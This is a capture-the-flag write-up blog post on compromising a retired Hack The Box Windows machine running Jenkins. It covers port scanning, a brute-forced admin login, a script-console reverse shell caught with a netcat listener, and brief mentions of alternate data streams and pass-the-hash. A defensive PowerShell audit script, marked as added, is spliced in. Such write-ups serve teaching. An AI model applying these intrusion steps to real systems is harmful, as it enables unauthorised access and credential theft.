System Hacked - From Beginning to End. Priv Escalation not included. Idaho Cyber Security

Good day all

Below is a system we hacked from beginning to end, without including the privilege escalation used to root the system. We want to ensure that we do not make this too easy for the noobs still learning. Please note this was a Windows system that we did on Hack The Box, in a lab that has since been retired.

root@Skullack:~# nmap -sV 10.10.10.63 -p- --reason

Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-10 21:43 SAST
Nmap scan report for 10.10.10.63
Host is up, received echo-reply ttl 127 (0.19s latency).
Not shown: 65531 filtered ports
Reason: 65531 no-responses
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

______________________________________________________________________________

Using curl to view the headers and source of the IIS site:

root@Skullack:~# curl -i http://10.10.10.63
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 06 Nov 2017 02:34:40 GMT
Accept-Ranges: bytes
ETag: "2277f7cba756d31:0"
Server: Microsoft-IIS/10.0
Date: Tue, 10 Apr 2018 22:54:37 GMT
Content-Length: 503

Ask Jeeves

Web, images, news, and lots of answers. Search Skins

Port 50000 showed us the login page of the web application:

http://10.10.10.63:50000/askjeeves/

WHAT IS JENKINS

Jenkins is an open source automation server written in Java. Jenkins helps to automate the non-human part of the software development process, with continuous integration and facilitating the technical aspects of continuous delivery. It is a server-based system that runs in servlet containers such as Apache Tomcat.

We brute-forced the admin login on the web interface and we were in. Going through all the settings we noticed a script console that runs Java-based scripts on the server. We proceeded to build our script and start a netcat listener to catch the connection back to our attacking system.

Script used: see below image

Starting a netcat listener on port 8044 and running the script. Below you can see we are logged in to the server running Jenkins by using a malicious script.

root@Skullack:~# nc -nlvp 8044
listening on [any] 8044 ...
connect to [10.10.14.48] from (UNKNOWN) [10.10.10.63] 49723
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator.jenkins>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9

Directory of C:\Users\Administrator.jenkins

04/10/2018 11:06 PM .
04/10/2018 11:06 PM ..
04/10/2018 10:07 PM 48 .owner
04/10/2018 08:43 PM 1,684 config.xml
04/10/2018 11:06 PM 1,353 credentials.xml
04/10/2018 08:43 PM 156 hudson.model.UpdateCenter.xml
11/03/2017 10:43 PM 374 hudson.plugins.git.GitTool.xml
11/03/2017 10:33 PM 1,712 identity.key.enc
11/03/2017 10:46 PM 94 jenkins.CLI.xml
04/10/2018 11:06 PM 148,268 jenkins.err.log
11/03/2017 10:47 PM 360,448 jenkins.exe
11/03/2017 10:47 PM 331 jenkins.exe.config
04/10/2018 08:43 PM 4 jenkins.install.InstallUtil.lastExecVersion
11/03/2017 10:45 PM 4 jenkins.install.UpgradeWizard.state
11/03/2017 10:46 PM 138 jenkins.model.DownloadSettings.xml
12/24/2017 03:38 PM 2,688 jenkins.out.log
04/10/2018 08:42 PM 4 jenkins.pid
11/03/2017 10:46 PM 169 jenkins.security.QueueItemAuthenticatorConfiguration.xml
11/03/2017 10:46 PM 162 jenkins.security.UpdateSiteWarningsConfiguration.xml
11/03/2017 10:47 PM 74,271,222 jenkins.war
04/10/2018 08:42 PM 34,147 jenkins.wrapper.log
11/03/2017 10:49 PM 2,881 jenkins.xml
04/10/2018 11:10 PM jobs
11/03/2017 10:33 PM logs
04/10/2018 08:43 PM 907 nodeMonitors.xml
11/03/2017 10:33 PM nodes
11/03/2017 10:44 PM plugins
11/03/2017 10:47 PM 129 queue.xml.bak
11/03/2017 10:33 PM 64 secret.key
11/03/2017 10:33 PM 0 secret.key.not-so-secret
04/10/2018 09:23 PM secrets
04/10/2018 09:03 PM 62 test.bat
04/10/2018 09:12 PM 76 test.ftp
11/08/2017 09:52 AM updates
04/10/2018 10:59 PM userContent
11/03/2017 10:33 PM users
11/03/2017 10:47 PM war
11/03/2017 10:43 PM workflow-libs
04/10/2018 08:49 PM workspace
26 File(s) 74,827,125 bytes
13 Dir(s) 6,945,353,728 bytes free

C:\Users\Administrator.jenkins>

Searching for hidden files and alternate data streams on the system. Why? Typically we do this to find hidden files and folders that administrators or users set up.

Command = DIR /A:H /R

The Windows privilege escalation ended in finding alternate data streams and then cracking the KeePass 2 file, which contained a long salted hash.

We cracked the hash and were presented with the password. Using a technique called pass the hash, which is supposedly long dead (NOT), worked flawlessly.

Again, finding alternate data streams using the command dir /R presented us with a hidden text file. We proceeded to read the hidden text file, and there we had it: we owned the system.
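The post finds its hidden data twice with DIR /A:H /R. For an administrator who wants to audit a tree for the same artefact (alternate data streams, including those on hidden files) and review what they contain, here is an added PowerShell example; it is not from the original post, and the function name and the audited path are assumptions for this illustration.

```powershell
# Added example (not from the original post): audit a directory tree for NTFS
# alternate data streams, the artefact the post finds with "dir /A:H /R".
# Function name and the audited path below are assumptions for illustration.
function Find-AlternateDataStream {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [switch] $ShowContent,        # also print a text preview of suspicious streams
        [int]    $MaxPreview = 200    # characters of content to preview per stream
    )

    # -Force includes hidden files, matching the /A:H part of the post's command.
    $files = Get-ChildItem -LiteralPath $Path -Recurse -File -Force -ErrorAction SilentlyContinue

    foreach ($file in $files) {
        # Get-Item -Stream * lists every stream; ':$DATA' is the file's normal content.
        $streams = Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
                   Where-Object { $_.Stream -ne ':$DATA' }

        foreach ($s in $streams) {
            # Zone.Identifier is written by browsers and mail clients on download and is
            # usually benign; any other named stream deserves a closer look.
            $note = if ($s.Stream -eq 'Zone.Identifier') { 'benign?' } else { 'REVIEW' }

            $preview = $null
            if ($ShowContent -and $note -eq 'REVIEW') {
                $content = Get-Content -LiteralPath $file.FullName -Stream $s.Stream -Raw -ErrorAction SilentlyContinue
                if ($content) {
                    $preview = $content.Substring(0, [Math]::Min($MaxPreview, $content.Length))
                }
            }

            [PSCustomObject]@{
                File    = $file.FullName
                Stream  = $s.Stream
                Bytes   = $s.Length
                Note    = $note
                Preview = $preview
            }
        }
    }
}

# Usage: audit a user profile (assumed path) and show the content of flagged streams.
Find-AlternateDataStream -Path 'C:\Users\Administrator' -ShowContent |
    Format-List File, Stream, Bytes, Note, Preview
```

Every stream flagged REVIEW should be explained by an application you know about; unexplained streams on user-writable paths are worth preserving and inspecting before they are removed.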

Since we still have new hackers or noobs learning how to do this, I have decided not to include the full priv escalation technique used to get root on this system. (Sorry noobs, but the answer is staring you in the face.)

Hope you enjoyed this post and perhaps learned something from it.

Till next time.

Gerhard De Villiers-Mohr – Senior Ethical Hacker – Secure ICT.
